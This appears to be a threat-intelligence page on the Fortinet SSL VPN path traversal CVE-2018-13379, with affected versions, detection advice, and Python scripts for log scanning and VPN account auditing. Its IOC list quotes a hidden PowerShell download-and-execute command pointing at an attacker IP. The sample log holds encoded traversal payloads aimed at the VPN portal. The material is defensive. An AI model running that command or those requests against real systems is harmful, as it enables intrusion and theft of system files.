CVE-2018-13379
published 2019-06-04

Priority: P1 (99), critical
CVSS 3.1 base score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.

Affected (8 ranges)

Vendor     Product     Version range        Fixed in
fortinet   fortinet    -                    -
fortinet   fortios     -                    -
fortinet   fortios     >= 5.4.6 < 5.4.13    5.4.13
fortinet   fortios     >= 5.6.3 < 5.6.8     5.6.8
fortinet   fortios     >= 6.0.0 < 6.0.5     6.0.5
fortinet   fortiproxy  < 1.2.9              1.2.9
fortinet   fortiproxy  -                    -
fortinet   fortiproxy  -                    -

Detection & IOCs (extracted from sources)

url:      hxxp://84.32.190[.]37:80/ahgffxvbghgfv
url:      hxxp://185.150.117[.]186:80/asdfgsdhsdfgsdfg
url:      hxxp://newspraize[.]com
url:      hxxp://realmacnow[.]com
ip:       172.67.176[.]244
ip:       104.21.43[.]80
url:      hxxp://67.205.182[.]129/u2/upload[.]php
path:     %public%\Music\svhost.exe
path:     %userprofile%\Music\t2747.exe
path:     %userprofile%\Pictures\socks.exe
path:     %systemroot%\System32\sok.exe
path:     %public%\Music\soks.exe
path:     C:\PerfLogs\xxx.exe
command:  -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://84.32.190[.]37:80/ahgffxvbghgfv'))"
  • CVE-2018-13379 exploitation involves specially crafted HTTP resource requests to the FortiOS SSL VPN web portal to download system files without authentication — monitor for anomalous GET requests to SSL VPN portal paths containing path traversal sequences (e.g., '../') from unauthenticated sources.
  • APT29 exploited CVE-2018-13379 for FortiGate VPN initial access; hunt for unexpected VPN logins from new or dormant accounts following FortiGate access log anomalies.
  • CVE-2018-13379 is among the most repeatedly exploited CVEs by ransomware actors for initial access; prioritize detection of path traversal attempts against FortiOS SSL VPN web portal endpoints.
  • After CVE-2018-13379 exploitation, validate all SSL-VPN local users for expected accounts and correct email addresses; unrecognized local users may indicate post-exploitation persistence.
  • Play ransomware ransom notes contain email addresses in the format [seven random characters]@gmx[.]com — use this pattern to identify Play ransomware infections in email/file system forensics.
  • CVE-2018-13379 affects FortiOS 6.0.0–6.0.4, 5.6.3–5.6.7, and 5.4.6–5.4.12, and FortiProxy 2.0.0, 1.2.0–1.2.8, 1.1.0–1.1.6, and 1.0.0–1.0.7. Check the running firmware version against these ranges before concluding a device is affected or applying mitigations.
  • Fortinet patched CVE-2018-13379 in May 2019 (FG-IR-18-384); systems not upgraded to patched firmware remain vulnerable. Mitigations were provided at the time of disclosure for those unable to upgrade.
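The first detection bullet above (anomalous requests to the SSL VPN portal containing traversal sequences) as working detection logic, written for this page as an added example rather than code from any of the cited sources. It assumes combined-format access-log lines (for instance from a reverse proxy or WAF in front of the portal) and that the FortiGate SSL-VPN web portal is reached under /remote/; the sample log lines, IPs and timestamps are constructed. It goes slightly beyond the bullet by also unwrapping percent-encoded and double-encoded traversal sequences and Windows-style backslashes, which a naive '../' string match would miss.

```python
import re
from urllib.parse import unquote

# Assumption: the FortiGate SSL-VPN web portal is reached under /remote/.
# Adjust for the portal path(s) actually exposed in your deployment.
SSLVPN_PREFIXES = ("/remote/",)

# Combined-format access log: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# A ".." at the start of the string, of a path segment or of a query value,
# followed by a separator or the end of the string (after decoding).
TRAVERSAL_RE = re.compile(r'(?:^|[/=?&])\.\.(?:/|$)')


def decode_url(url, rounds=3):
    """Percent-decode repeatedly so double-encoded sequences (%252e) are
    unwrapped, then fold backslashes to slashes so ..\\ and ../ match alike."""
    prev, cur = None, url
    for _ in range(rounds):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")


def is_traversal(url):
    return TRAVERSAL_RE.search(decode_url(url)) is not None


def is_sslvpn_portal(url):
    path = decode_url(url).split("?", 1)[0]
    return path.startswith(SSLVPN_PREFIXES)


def find_traversal_attempts(log_text):
    """One finding per request whose decoded URL carries a traversal
    sequence; `portal` is True when the target is the SSL-VPN portal,
    which is what CVE-2018-13379 exploitation looks like on the wire."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_traversal(m["url"]):
            continue
        findings.append({
            "ip": m["ip"],
            "method": m["method"],
            "url": m["url"],
            "decoded": decode_url(m["url"]),
            "status": int(m["status"]),
            "portal": is_sslvpn_portal(m["url"]),
        })
    return findings


def portal_hits_by_ip(findings):
    """Count portal traversal attempts per source address for triage/blocking."""
    counts = {}
    for f in findings:
        if f["portal"]:
            counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed sample lines (documentation address ranges, made-up timestamps),
# not real traffic. Lines 3-6 are portal traversal attempts in plain,
# percent-encoded, double-encoded and backslash form; line 7 is a traversal
# against a non-portal path.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2021:12:00:01 +0000] "GET /remote/login?lang=en HTTP/1.1" 200 1532
203.0.113.10 - - [10/Mar/2021:12:00:02 +0000] "POST /remote/logincheck HTTP/1.1" 200 418
198.51.100.7 - - [10/Mar/2021:12:00:05 +0000] "GET /remote/login?lang=../../../../etc/hosts HTTP/1.1" 200 2048
198.51.100.7 - - [10/Mar/2021:12:00:06 +0000] "GET /remote/login?lang=%2e%2e%2f%2e%2e%2fetc%2fhosts HTTP/1.1" 200 2048
198.51.100.7 - - [10/Mar/2021:12:00:07 +0000] "GET /remote/login?lang=%252e%252e%252fetc%252fhosts HTTP/1.1" 400 0
198.51.100.9 - - [10/Mar/2021:12:00:09 +0000] "GET /remote/login?lang=..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 0
203.0.113.12 - - [10/Mar/2021:12:00:11 +0000] "GET /static/img/..%2flogo.png HTTP/1.1" 200 9001
"""

if __name__ == "__main__":
    hits = find_traversal_attempts(SAMPLE_LOG)
    for f in hits:
        tag = "PORTAL" if f["portal"] else "other"
        print(f'{tag:6} {f["ip"]:14} {f["status"]} {f["decoded"]}')
    print("portal hits by source:", portal_hits_by_ip(hits))
```

A 200 response to a portal traversal request is the case to escalate first: it is consistent with the file read the advisory describes, whereas 400/404 responses from the same source still justify blocking and a check that the device is on a fixed firmware version.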
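The post-exploitation check in the bullet about validating SSL-VPN local users, as an added example written for this page (not Fortinet's tooling or code from any cited source). It parses the `config user local` and `config user group` sections of a FortiOS configuration backup and diffs the local accounts reachable through the SSL-VPN groups against a baseline of expected account names and email addresses. The config excerpt, account names, addresses and the group name `sslvpn-users` are constructed; the keywords `config user local`, `edit`, `set email-to`, `set member`, `next` and `end` follow the FortiOS CLI config syntax. Which group(s) the SSL-VPN portal actually uses is deployment-specific and is passed in as a parameter.

```python
import shlex

# Constructed excerpt of a FortiOS configuration backup (not from a real device).
# Account names, addresses and the group name are invented for the example.
SAMPLE_CONFIG = """\
config user local
    edit "vpn-alice"
        set type password
        set two-factor email
        set email-to "alice@corp.example"
        set passwd ENC AAAA
    next
    edit "vpn-bob"
        set type password
        set two-factor email
        set email-to "b0b@mailbox.example"
        set passwd ENC BBBB
    next
    edit "support"
        set type password
        set passwd ENC CCCC
    next
end
config user group
    edit "sslvpn-users"
        set member "vpn-alice" "vpn-bob" "support"
    next
end
"""

# Baseline from the identity source of record: local account -> expected email-to.
EXPECTED_USERS = {
    "vpn-alice": "alice@corp.example",
    "vpn-bob": "bob@corp.example",
    "vpn-carol": "carol@corp.example",
}

# Group(s) referenced by the SSL-VPN portal and its firewall policies (assumed name).
SSLVPN_GROUPS = ("sslvpn-users",)


def parse_objects(config_text, block):
    """Return {object-name: {setting: value}} for the entries of one
    top-level 'config <block>' section of a FortiOS configuration dump.
    Nested sub-tables inside an entry are tracked on the stack and ignored."""
    objects, stack, current = {}, [], None
    for raw in config_text.splitlines():
        tokens = shlex.split(raw)
        if not tokens:
            continue
        kw, args = tokens[0], tokens[1:]
        if kw == "config":
            stack.append(" ".join(args))
        elif kw == "end":
            stack.pop()
        elif stack and stack[-1] == block:
            if kw == "edit":
                current = args[0]
                objects.setdefault(current, {})
            elif kw == "next":
                current = None
            elif kw == "set" and current is not None and len(args) >= 2:
                # single value -> str, multi-value (e.g. member lists) -> list
                objects[current][args[0]] = args[1] if len(args) == 2 else args[1:]
    return objects


def sslvpn_local_users(config_text, groups):
    """Local accounts that are members of the given SSL-VPN groups."""
    users = parse_objects(config_text, "user local")
    memberships = parse_objects(config_text, "user group")
    in_scope = set()
    for g in groups:
        member = memberships.get(g, {}).get("member", [])
        in_scope.update([member] if isinstance(member, str) else member)
    # Group members that are remote servers (LDAP/RADIUS) are not local users; skip them.
    return {name: users[name] for name in in_scope if name in users}


def audit_sslvpn_users(config_text, groups, expected):
    """Diff the SSL-VPN local accounts in the config against the baseline:
    accounts nobody expects, accounts whose email-to was changed, and
    expected accounts that are gone."""
    present = sslvpn_local_users(config_text, groups)
    report = {"unexpected": [], "email_mismatch": [], "missing": []}
    for name in sorted(present):
        email = present[name].get("email-to")
        if name not in expected:
            report["unexpected"].append(name)
        elif email != expected[name]:
            report["email_mismatch"].append((name, email, expected[name]))
    report["missing"] = sorted(n for n in expected if n not in present)
    return report


if __name__ == "__main__":
    for key, items in audit_sslvpn_users(SAMPLE_CONFIG, SSLVPN_GROUPS, EXPECTED_USERS).items():
        print(f"{key}: {items}")
```

Run it against the config backup taken after patching, not the live CLI output, so the comparison is reproducible; an unexpected account or a changed email-to on an account that uses email two-factor is the persistence signal the bullet points at.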

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     5.0    MEDIUM    AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck  -        9.1    CRITICAL  -
cisa       -        9.8    CRITICAL  -